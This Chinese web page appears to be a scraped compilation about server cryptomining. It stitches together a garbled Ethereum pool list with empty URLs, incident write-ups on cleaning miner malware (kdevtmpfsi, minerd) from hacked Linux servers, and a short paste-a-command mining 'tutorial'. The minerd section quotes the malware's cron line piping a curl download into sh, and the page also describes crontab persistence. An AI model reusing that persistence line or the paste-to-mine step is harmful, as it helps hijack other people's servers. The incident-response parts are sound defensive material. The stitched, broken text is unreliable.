服务器挖矿攻击设置在哪里_服务器挖矿攻击设置在哪

以太坊矿池有哪些

1. Ethpool（Ethermine）ETHpool.org是第一个官方的以太坊矿池。此前由于工作量超负荷，该矿池不接受新用户，只接受老客户。因此，许多新矿工被迫转向单独挖矿，因为那时还没有其他可替代的矿池。在Ethpool上挖矿，必须安装以太坊的C++ETH版本。? 市场占有率：23％? 当前矿池算力：399.1GH / s? 挖矿奖励结算模式：PPLNS? 费率：1.0％? 网址：. NanopoolNanopool虽然是新矿池，但已经是目前以太坊上最大的矿池之一。份额（Share）的复杂性是静态的，相当于50亿。在该矿池上进行挖矿的最低哈希率仅为5 Mhesh / s。此外，此矿池根据PPLNS方案计算挖矿奖励，其中N是最近10分钟内所有接受的份额。（注：PPLNS全称Pay Per Last N Shares，即根据最近的N个股份来支付收益。）Nanopool的服务器遍及全球，官网页面简洁直观。但是这个矿池的最低支付门槛相对较高，建议连接3个服务器，避免等待长时间的付款期。? 市场占有率：8％? 当前矿池算力：16,176.3GH / s? 挖矿奖励结算模式：PPLNS? 费用：1.0％? 网址：. F2Pool（鱼池）F2Pool是2019年最受欢迎的矿池之一。F2pool的服务器主要位于中国、其他亚洲国家和美国。F2pool.com因其开放性，可访问性和易用性而备受矿工喜爱。矿工在F2Pool上注册后才可以挖矿。以太坊挖矿需要一个显卡矿机。 ? 市场占有率：10％? 当前矿池算力：19.38TH / s? 挖矿奖励结算模式：PPS+? 费率：2.5％? 网址：. Sparkpool（星火矿池）在ETH，GRIN和BEAM生态系统中，最强大的中国资源库是Sparkpool，它是与全球矿工合作的开放资源。在挖矿之前，你需要配置矿机。基于AMD GPU处理器的以太坊挖矿收益更高。它需要闪存改进的BIOS并调整MSI Afterburner或AMD驱动程序设置中的超频选项。 ? 市场占有率：29％? 当前矿池算力：56.96TH / s? 挖矿奖励结算模式：PPS +? 费用：1.0％? 网址：. Dwarfpool在DwarfPool，矿工的信用等级分为RBPPS或HBPPS。使用RBPPS，只要有A值，你就可以获得对应奖励（死块除外）。HBPPS计提算法是基于时间的股份支付。每小时计算一次所有推广和发现的区块。该矿池具有经过优化的最佳挖矿引擎，拒绝率较低，透明且详细的统计信息。每小时进行一次支付结算，服务器遍布世界各地。? 市场占有率：6％? 当前矿池算力：2377109 MH / s? 挖矿奖励结算模式：HBPPS? 费用：1.0％? 网址：. MiningPoolHubMiningPoolHub允许矿工通过挖矿获利，并根据不同支付系统的汇率来交易数字货币。该矿池使用PPLNS算法确定用户奖励。提款手续费为0.9％。? 市场份额：3.7％? 当前矿池算力：7.05T / s? 挖矿奖励类型：PPLNS? 费用：1.0％?

求助服务器被挖矿程序入侵，如何排查

 新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

SSH远程登录客户的Linux服务器，查看当前的进程发现有一个特别的进程占用了百分之100

的CPU，而且会持续不断的占用，我们查了查该进程，发现不是linux的系统进程，我们对进程

的目录进行查看，发现该进程是一个木马进程，再仔细进行安全分析，才确定是目前最新的挖

矿木马病毒，挖的矿分很多种，什么比特币，什么罗门币的，太多太多，看来现在的挖矿技术

扩展到了入侵服务器进行肉鸡挖矿了。

挖矿木马的检测与清除

我们在系统的目录下发现了挖矿木马主要是以 Q99.sh命名的文件来控制客户的linux服务器，看

里面写的代码是以root权限运行，并自动启动计划任务，当服务器重启时继续执行计划任务，

导致客户怎么重启都于事无补，还是卡的要命。该木马代码还调用了一些Linux系统命令，bashe

bashd来挖矿，该命令是最直接也是占用CPU到顶峰的关键，太粗鲁了，这样的挖矿本身就会让

客户发现问题，看来挖矿者只顾着赚钱，不考虑长久之道了。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马

MongoDB库中的数据莫名其妙没有了，发觉如下信息：

1、 top -d 5命令 ，查看系统负载情况、是否有未知进程，发现一个名为kdevtmpfsi的进程，经科普它是一个挖矿程序，会占用服务器高额的CPU、内存资源。如图，CPU占用率高达788.7%，而且是yarn用户下：

2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径：/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息（此时我的服务器并没有开启yarn服务，如果有yarn的相关进程则可判断是攻击者开启的进程），发现另外还有个kinsing进程，经科普kinsing进程是kdevtmpfsi的守护进程：

4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip，判断是kdevtmpfsi的发出者：

5、经查询该ip的所在国家是俄罗斯：

6、 find / -iname kdevtmpfsi 命令再次确定命令所在位置以便删除：

7、 cd /tmp 进入相关目录：

8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序：

9、** kill -9 40422**杀掉kdevtmpfsi进程：

10、发现并没杀掉所有kdevtmpfsi进程，再次查找yarn的相关进程（因为之前已确认病毒是在yarn下），果真还有kdevtmpfsi进程存在：

11、用命令 批量杀掉 相关进程：

12、删除kinsing文件：

13、现在，已经把挖矿程序及相关进程删除掉了，但是还有两处没做处理：

14、 crontab -l 命令先看看crontab的定时任务列表吧：

15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh ：

16、新增 定时任务 并删除攻击者的挖矿定时任务：

17、 crontab -l命令 查看现在只有杀进程的定时任务了：

18、禁止黑客的IP地址。

最初安装MongoDB时，并未设置密码认证，存在漏洞，导致黑客通过漏洞攻击服务器，并在程序里植入木马/病毒。单纯的kill -9 id杀掉病毒进程是杀不彻底的，治标不治本，应该定时删除病毒进程，禁止攻击者IP，重新安装系统或相关软件。

经过几天的观察，服务器运行正常，再没有被黑客攻击成功。

阿里云服务器被挖矿了怎么办？(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

如何用Linux服务器挖矿教程

Linux服务器挖矿，只需要两步

打开 网站，输入手机号，选择你要使用多少CPU来挖矿，默认为使用50%的CPU进行挖矿，点击生成你的专属命令并复制

进入控制台粘贴命令，并点击运行

就是这么操作简单。